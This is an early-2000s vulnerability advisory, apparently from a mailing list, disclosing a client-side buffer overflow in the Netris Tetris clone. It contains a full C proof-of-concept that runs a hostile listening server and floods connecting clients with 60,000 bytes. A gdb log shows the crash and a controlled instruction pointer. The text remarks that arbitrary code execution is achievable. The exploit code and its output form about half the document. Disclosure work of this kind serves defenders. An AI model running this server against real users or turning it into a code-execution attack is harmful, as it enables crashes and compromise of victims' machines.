-[INTRODUCTION]- Netris is a Linux clone of the classic infamous game Tetr*s, giving users three main game modes: play an individual game, server mode: bind to a port and wait for an incoming connection from an opponents Netris client, and connect mode: connect to an opponents Netris client which is listening for connections on a selected port. A vulnerability has already been discovered (http://www.securityfocus.com/bid/5680/info/) that when Netris is ran in listen mode, it leaves itself open to a "critical" buffer overflow vulnerability due to insufficient bounds checking, which could result in root privileges for the attacker, else the UID of the user running Netris. However, I have discovered a new vulnerability in which Netris is also vulnerable to a similar buffer overflow attack when running in client mode (connecting to a remote opponents Netris client in listen mode, rather than listening for an incoming connection), due to insufficient bounds checking of what the server sends. -[EXPLOIT]- The following code is a small PoC exploit program I have written to exploit the existing buffer overflow vulnerability, causing DoS (corruption of stack, crashing of Netris program), which binds itself to a port, and exploits the Buffer Overflow Vulnerability in the Netris program, when a Netris client attempts to connect:- ------------------------CUT HERE---------------------- #include <stdio.h> #include <stdlib.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define BACKLOG 1 int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <port>\n", argv[0]); exit(-1); } int sock, csock, i; struct sockaddr_in client; struct sockaddr_in me; int sinlen; char buffer[60001]; memset(buffer, 'a', 60000); if((sock = socket(AF_INET, SOCK_STREAM, 0)) == NULL) { printf("Couldn't create socket!\n"); exit(-1); } me.sin_family = AF_INET; me.sin_port = htons(atoi(argv[1])); me.sin_addr.s_addr = INADDR_ANY; if(bind(sock, (struct sockaddr *)&me, sizeof(struct sockaddr)) == -1) { perror("bind()"); exit(-1); } listen(sock, BACKLOG); printf("Listening on port %s for connections...\n", argv[1]); sinlen = sizeof(struct sockaddr); while(1) { csock = accept(sock, (struct sockaddr *)&client, &sinlen); printf("Got connection, sending...\n"); send(csock, buffer, strlen(buffer), 0); sleep(1); close(csock); } } ------------------------CUT HERE---------------------- Here is a simple example of the exploitation process of the Netris program: ------------------------CUT HERE---------------------- [shaunige@localhost exploits]$ ./netris-exploit 1234 Listening on port 1234 for connections... Got connection, sending... # whilst meantime in the other window: [shaunige@localhost shaunige]$ netris -c localhost -p 1234 Your opponent is using an old, incompatible version of Netris. They should get the latest version. Segmentation fault (core dumped) [shaunige@localhost shaunige]$ gdb -c core.13140 GNU gdb 5.2.1-2mdk (Mandrake Linux) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux-gnu". Core was generated by `netris -c localhost -p 1234'. Program terminated with signal 11, Segmentation fault. #0 0x61616161 in ?? () (gdb) quit [shaunige@localhost shaunige]$ ------------------------CUT HERE---------------------- As you can see, I tried to connect to what I thought was my to-be opponents Netris program in listen mode, and the listening server sent a huge string to the client, overflowing the buffer in which Netris is expecting to receive greetings from the remote Netris program, asking it to start the game. Obviously, the vulnerability can be instead exploited by an attacker to execute arbitrary code on the victim's machine, with the privileges of the user running Netris to connect to the listening port, rather than simply causing a DoS situation. -[PATCH/WORKAROUND]- I have not yet written a patch to fix this vulnerability in Netris, I am in the process of contacting the vendor regarding this matter. -[CREDIT]- I discovered this vulnerability on 11/08/03. Thank you for your time. Shaun. ________________________________________________________________________ Want to chat instantly with your online friends? Get the FREE Yahoo! Messenger http://uk.messenger.yahoo.com/
